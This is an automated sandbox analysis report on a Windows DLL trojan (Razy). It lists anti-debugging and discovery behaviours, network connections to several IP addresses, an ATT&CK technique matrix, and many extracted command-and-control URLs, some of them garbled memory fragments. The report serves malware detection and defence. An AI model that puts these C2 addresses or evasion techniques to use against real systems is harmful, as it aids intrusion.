                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                      Source: C:\Windows\System32\loaddll32.exeCode function: OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBA3930 GetTokenInformation,GetTokenInformation,GetSystemInfo,GetTokenInformation,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBBCEF8 FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6EC097B0 IsDebuggerPresent,IsDebuggerPresent,CreateThread,std::_Timevec::_Timevec,WaitForSingleObjectEx,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6EC08B60 __invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__cftoe,__aligned_msize,__invoke_watson_if_error,GetFileType,WriteConsoleW,GetLastError,__cftoe,WriteFile,WriteFile,OutputDebugStringW,__invoke_watson_if_error,__CrtDbgReportWV,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6EC047C0 mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6ECDBA72 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6ECDB64D push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6ECDB942 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBA6C50 KiUserExceptionDispatcher,LdrLoadDll,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBA7A60 RtlAddVectoredExceptionHandler,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6EBD63A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.77.0.96 235
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.56.219.47 180
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.46.210.220 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 143.244.140.214 40
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll',#1
                      Source: loaddll32.exe, 00000000.00000002.770628438.0000000001F40000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.771000138.00000000038A0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.770628438.0000000001F40000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.771000138.00000000038A0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.770628438.0000000001F40000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.771000138.00000000038A0000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
                      Source: loaddll32.exe, 00000000.00000002.770628438.0000000001F40000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.771000138.00000000038A0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
                      Source: loaddll32.exe, 00000000.00000002.770628438.0000000001F40000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.771000138.00000000038A0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetACP,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBA2980 GetUserNameW,

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection112Process Injection112OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsObfuscated Files or Information1LSASS MemorySecurity Software Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSAccount Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsSystem Owner/User Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol13Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Network Configuration Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemFile and Directory Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Information Discovery23Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      SecuriteInfo.com.Variant.Razy.980776.28061.dll7%VirustotalBrowse
                      SecuriteInfo.com.Variant.Razy.980776.28061.dll5%ReversingLabsWin32.Trojan.Razy

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://195.56.219.47:8116/0%Avira URL Cloudsafe
                      https://45.77.0.96//Fm0%Avira URL Cloudsafe
                      https://143.244.140.214:808/00%Avira URL Cloudsafe
                      https://192.46.210.220/aenh.dll0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/14H0%Avira URL Cloudsafe
                      https://143.244.140.214:808/30%Avira URL Cloudsafe
                      https://143.244.140.214:808/lB(0%Avira URL Cloudsafe
                      https://143.244.140.214:808/&0%Avira URL Cloudsafe
                      https://455.56.219.47:8116/0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/.0.96:6891/0%Avira URL Cloudsafe
                      https://192.46.210.220/aenh.dllltbac0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/y#0%Avira URL Cloudsafe
                      https://192.46.210.220/TL0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/)0%Avira URL Cloudsafe
                      https://185.56.219.47/&0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/ra0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/p0%Avira URL Cloudsafe
                      https://143.244.140.214:808/Y0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/r0%Avira URL Cloudsafe
                      https://143.244.140.214:808/oft0%URL Reputationsafe
                      https://143.244.140.214:808/O0%Avira URL Cloudsafe
                      https://143.244.140.214:808/P0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/o)0%Avira URL Cloudsafe
                      https://453.244.140.214:808/0%Avira URL Cloudsafe
                      https://143.244.140.214:808/S0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/fW0%Avira URL Cloudsafe
                      https://143.244.140.214:808/H0%Avira URL Cloudsafe
                      https://192.46.210.220/)0%Avira URL Cloudsafe
                      https://192.46.210.220/7.0.96:6891/0%Avira URL Cloudsafe
                      https://143.244.140.214:808/#Gq0%Avira URL Cloudsafe
                      https://185.56.219.47/40%Avira URL Cloudsafe
                      http://crl.globalsF0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/v0%Avira URL Cloudsafe
                      https://192.46.210.220/40%Avira URL Cloudsafe
                      https://45.77.0.96:6891/08/Y0%Avira URL Cloudsafe
                      https://143.244.140.214:808/B0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/140%Avira URL Cloudsafe
                      https://192.46.210.220/.0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/O0%Avira URL Cloudsafe
                      https://143.244.140.214/0%URL Reputationsafe
                      https://143.244.140.214:808/My0%URL Reputationsafe
                      https://185.56.219.47:8116/S0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/S0%Avira URL Cloudsafe
                      https://185.56.219.47/0%URL Reputationsafe
                      https://185.56.219.47:8116/V0%Avira URL Cloudsafe
                      https://192.46.210.220/C0%Avira URL Cloudsafe
                      https://1845.77.0.96:6891/0%Avira URL Cloudsafe
                      https://192.46.210.220/?0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/Y0%Avira URL Cloudsafe
                      https://192.46.210.220/J0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/8D0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/08/0%Avira URL Cloudsafe
                      https://192.46.210.220/Q0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/X0%Avira URL Cloudsafe
                      https://143.244.140.214:808/0%URL Reputationsafe
                      https://143.244.140.214:808/7)0%Avira URL Cloudsafe
                      https://185.56.219.47/g0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/.0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/0%URL Reputationsafe
                      https://45.77.0.96:6891//0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/30%Avira URL Cloudsafe
                      https://192.46.210.220/X0%Avira URL Cloudsafe
                      https://143.244.140.214:808/8DH0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/00%Avira URL Cloudsafe
                      https://45.77.0.96:6891/40%Avira URL Cloudsafe
                      https://143.244.140.214/Q#0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/40%Avira URL Cloudsafe
                      https://185.56.219.47:8116/i#0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/)0%Avira URL Cloudsafe
                      https://143.244.140.214:808/%)0%Avira URL Cloudsafe
                      https://143.244.140.214:808/F)0%Avira URL Cloudsafe
                      https://143.244.140.214/v0%Avira URL Cloudsafe
                      https://19.77.0.96:6891/0%Avira URL Cloudsafe
                      https://192.46.210.220/i0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/B0%Avira URL Cloudsafe
                      https://192.46.210.220/g0%Avira URL Cloudsafe
                      https://143.244.140.214:808/O)0%Avira URL Cloudsafe
                      https://193.244.140.214:808/0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/H30%Avira URL Cloudsafe
                      https://45.77.0.96:6891/80%Avira URL Cloudsafe
                      https://192.46.210.220/r0%Avira URL Cloudsafe
                      https://192.46.210.220/n0%Avira URL Cloudsafe
                      https://143.244.140.214:808/hy0%URL Reputationsafe
                      https://143.244.140.214:808/8D0%Avira URL Cloudsafe
                      https://45.77.0.96/F70%Avira URL Cloudsafe
                      https://143.244.140.214:808/b)0%Avira URL Cloudsafe
                      https://192.46.210.220/HL0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/650%Avira URL Cloudsafe
                      https://143.244.140.214:808/k)0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/0%URL Reputationsafe
                      https://45.77.0.96/0%URL Reputationsafe
                      https://192.46.210.220/%Ev0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/rS0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/p0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/h.dll0%Avira URL Cloudsafe
                      https://192.46.210.220/coro80%Avira URL Cloudsafe
                      https://45.77.0.96:6891/6/0%Avira URL Cloudsafe
                      https://18192.46.210.220/0%Avira URL Cloudsafe
                      https://192.46.210.220/0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://192.46.210.220/true
                      • URL Reputation: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://195.56.219.47:8116/loaddll32.exe, 00000000.00000003.626454578.00000000016DB000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96//Fmloaddll32.exe, 00000000.00000003.395037799.000000000166E000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214:808/0loaddll32.exe, 00000000.00000003.680591172.0000000001676000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/aenh.dllloaddll32.exe, 00000000.00000003.600682349.0000000001676000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.439196608.000000000166E000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96:6891/14Hloaddll32.exe, 00000000.00000003.476592616.0000000001676000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214:808/3loaddll32.exe, 00000000.00000003.399573978.0000000001676000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214:808/lB(loaddll32.exe, 00000000.00000003.747478637.000000000166F000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214:808/&loaddll32.exe, 00000000.00000003.756126236.000000000166D000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.567390680.00000000056FE000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://455.56.219.47:8116/loaddll32.exe, 00000000.00000003.586077792.00000000016DB000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.458615929.00000000056FE000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      https://45.77.0.96:6891/.0.96:6891/rundll32.exe, 00000004.00000003.441859991.00000000056FE000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/aenh.dllltbacloaddll32.exe, 00000000.00000003.530192281.000000000166E000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://185.56.219.47:8116/y#loaddll32.exe, 00000000.00000003.444519765.000000000166E000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/TLloaddll32.exe, 00000000.00000003.439196608.000000000166E000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://185.56.219.47:8116/)loaddll32.exe, 00000000.00000003.742305887.000000000166F000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://185.56.219.47/&loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96:6891/raloaddll32.exe, 00000000.00000003.574895771.0000000001676000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96:6891/ploaddll32.exe, 00000000.00000002.769348582.000000000166E000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214:808/Yloaddll32.exe, 00000000.00000003.680591172.0000000001676000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96:6891/rloaddll32.exe, 00000000.00000003.476592616.0000000001676000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.612166801.00000000034C9000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214:808/oftloaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.764620245.000000000166E000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.747478637.000000000166F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.600682349.0000000001676000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.439196608.000000000166E000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.618224210.0000000001676000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.586087040.0000000001676000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://143.244.140.214:808/Oloaddll32.exe, 00000000.00000003.742305887.000000000166F000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214:808/Ploaddll32.exe, 00000000.00000003.658533321.0000000001676000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://185.56.219.47:8116/o)rundll32.exe, 00000004.00000003.741865046.00000000034C9000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://453.244.140.214:808/loaddll32.exe, 00000000.00000003.764620245.000000000166E000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      https://143.244.140.214:808/Sloaddll32.exe, 00000000.00000003.408181456.000000000166E000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://185.56.219.47:8116/fWloaddll32.exe, 00000000.00000003.629814185.0000000001673000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214:808/Hloaddll32.exe, 00000000.00000003.414827142.000000000166E000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.730453084.0000000001676000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/)loaddll32.exe, 00000000.00000003.453087889.0000000001672000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/7.0.96:6891/rundll32.exe, 00000004.00000003.541565391.00000000056FE000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214:808/#Gqloaddll32.exe, 00000000.00000003.400716165.0000000001673000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://185.56.219.47/4loaddll32.exe, 00000000.00000003.392156959.0000000001673000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://crl.globalsFrundll32.exe, 00000004.00000003.377435107.00000000056FF000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96:6891/vrundll32.exe, 00000004.00000003.612201176.00000000056FE000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/4loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96:6891/08/Yloaddll32.exe, 00000000.00000003.399573978.0000000001676000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214:808/Bloaddll32.exe, 00000000.00000003.414827142.000000000166E000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96:6891/14loaddll32.exe, 00000000.00000003.628735432.0000000001672000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.418080162.000000000166E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.612201176.00000000056FE000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/.rundll32.exe, 00000004.00000003.533230659.00000000056FE000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://185.56.219.47:8116/Oloaddll32.exe, 00000000.00000003.586087040.0000000001676000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214/loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.390529394.00000000056FE000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://45.77.0.96:6891/Rloaddll32.exe, 00000000.00000003.431000649.000000000166D000.00000004.00000001.sdmpfalse
                        		unknown
                        https://143.244.140.214:808/Myloaddll32.exe, 00000000.00000003.739023483.0000000001676000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://185.56.219.47:8116/Sloaddll32.exe, 00000000.00000003.586087040.0000000001676000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://45.77.0.96:6891/Sloaddll32.exe, 00000000.00000003.569505666.0000000001676000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://185.56.219.47/loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://185.56.219.47:8116/Vloaddll32.exe, 00000000.00000003.703443485.0000000001675000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://192.46.210.220/Cloaddll32.exe, 00000000.00000003.747478637.000000000166F000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://1845.77.0.96:6891/loaddll32.exe, 00000000.00000003.641066942.0000000001675000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        https://192.46.210.220/?loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://185.56.219.47:8116/Yloaddll32.exe, 00000000.00000003.676183514.0000000001676000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://192.46.210.220/Jloaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://185.56.219.47:8116/8Dloaddll32.exe, 00000000.00000003.742305887.000000000166F000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://45.77.0.96:6891/08/loaddll32.exe, 00000000.00000003.719882602.0000000001675000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://192.46.210.220/Qloaddll32.exe, 00000000.00000003.764620245.000000000166E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://45.77.0.96:6891/Xloaddll32.exe, 00000000.00000003.519010998.00000000016DB000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://143.244.140.214:808/loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.764620245.000000000166E000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.497146679.000000000166F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.400716165.0000000001673000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.476592616.0000000001676000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.441859991.00000000056FE000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://143.244.140.214:808/7)loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://185.56.219.47/gloaddll32.exe, 00000000.00000003.392156959.0000000001673000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://45.77.0.96:6891/.rundll32.exe, 00000004.00000003.541565391.00000000056FE000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://45.77.0.96:6891/loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.476592616.0000000001676000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.547755261.00000000034C9000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://45.77.0.96:6891//loaddll32.exe, 00000000.00000002.769348582.000000000166E000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://185.56.219.47:8116/3loaddll32.exe, 00000000.00000003.658533321.0000000001676000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://192.46.210.220/Xloaddll32.exe, 00000000.00000003.497146679.000000000166F000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://143.244.140.214:808/8DHloaddll32.exe, 00000000.00000003.594551032.0000000001673000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://185.56.219.47:8116/0loaddll32.exe, 00000000.00000003.680591172.0000000001676000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://45.77.0.96:6891/4loaddll32.exe, 00000000.00000003.408181456.000000000166E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://143.244.140.214/Q#loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://185.56.219.47:8116/4loaddll32.exe, 00000000.00000003.708744109.0000000001676000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://185.56.219.47:8116/i#loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://45.77.0.96:6891/)loaddll32.exe, 00000000.00000003.574895771.0000000001676000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://143.244.140.214:808/%)loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://143.244.140.214:808/F)loaddll32.exe, 00000000.00000003.764620245.000000000166E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://143.244.140.214/vrundll32.exe, 00000004.00000003.390529394.00000000056FE000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://19.77.0.96:6891/rundll32.exe, 00000004.00000003.612201176.00000000056FE000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://192.46.210.220/iloaddll32.exe, 00000000.00000003.395037799.000000000166E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://185.56.219.47:8116/Bloaddll32.exe, 00000000.00000003.418080162.000000000166E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://192.46.210.220/gloaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
